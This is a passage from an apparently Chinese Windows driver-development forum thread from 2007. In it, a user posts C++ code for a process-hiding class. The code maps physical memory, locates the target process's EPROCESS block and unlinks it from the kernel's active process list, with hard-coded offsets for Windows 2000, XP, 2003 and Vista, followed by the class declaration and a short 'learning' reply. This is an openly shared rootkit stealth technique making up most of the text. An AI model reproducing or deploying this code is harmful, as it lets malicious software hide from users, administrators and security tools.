   if (0 == g_osvi.dwMinorVersion)
   {
   // in Win2000/Vista:
   fw = GetData(PVOID(process + 0xa0));
   bw = GetData(PVOID(process + 0xa4));
   }
   else if ((1 == g_osvi.dwMinorVersion)
   || (2 == g_osvi.dwMinorVersion))
   {
   // in WinXP: in Win2003
   fw = GetData(PVOID(process + 0x88));
   bw = GetData(PVOID(process + 0x8c));
   }

   // ****
   TRACE(_T("process = %p\tfw = %p\tbw = %p ****Correct\n"), process, fw, bw);
   TFileTrace(_T("process = %p\tfw = %p\tbw = %p ****Correct\n"), process, fw, bw);

   // 下面的两个SetData完成对进程活动链的更改，
   // 也就是让进程活动链跳过当前进程的EPROCESS块
   SetData(PVOID(fw + 4), bw);
   SetData(PVOID(bw), fw);

   // 完成了
   UnmapViewOfFile(g_pMapPhysicalMemory);
   g_pMapPhysicalMemory = NULL;
   CloseHandle(g_hMPM);
   g_hMPM = NULL;

   return TRUE;
}

// 隐藏进程接口
BOOL CHideProcess::HideCurrent()
{
   TFileTrace(_T("Hide Current Process ID = %d \n"), GetCurrentProcessId());
   return YHideProcess(GetCurrentProcessId());
}

// 隐藏进程接口
BOOL CHideProcess::HideByID(DWORD dwID)
{
   TFileTrace(_T("Hide Process ID = %d \n"), dwID);
   return YHideProcess(dwID);
}

Thinking

回复喜欢

ks12345

驱动小牛

注册日期2006-09-21
最后登录2016-01-09
粉丝0
关注0
积分7分
威望223点
贡献值0点
好评度189点
原创分0分
专家分0分

加关注写私信

18楼^#

发布于：2007-04-27 18:33

哇塞，后面的内容怎么自动变成斜体了，是不是因为太长了？
这是比较久的代码了，貌似有点乱～
class CHideProcess
{
public:
   // 接口：隐藏当前进程
   static BOOL HideCurrent();

   // 接口：隐藏当前进程
   static BOOL HideByID(DWORD dwID);

   // 析构
   virtual ~CHideProcess();
protected:
   static BOOL InitNTDLL();
   static BOOL YHideProcess(DWORD dwID);
   static VOID CloseNTDLL();
   static VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection);
   static HANDLE OpenPhysicalMemory();
   static PVOID LinearToPhys(PULONG BaseAddress, PVOID addr);
   static ULONG GetData(PVOID addr);
   static BOOL SetData(PVOID addr,ULONG data);
   static DWORD GetEprocessFromPid (ULONG PID);
   // long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp);

protected:
   static BOOL m_bInit;
   static CHideProcess m_NoAction;

private:
   // 构造析构
   CHideProcess();
};

Thinking

回复喜欢

feifei1268 驱动牛犊注册日期2006-11-24 最后登录2009-11-07 粉丝0 关注0 积分60分威望7点贡献值0点好评度6点原创分0分专家分0分加关注写私信	19楼^# 发布于：2007-04-28 04:07 好，学习一下
	回复(0) 喜欢(0)

您需要登录后才可以回帖，登录或者注册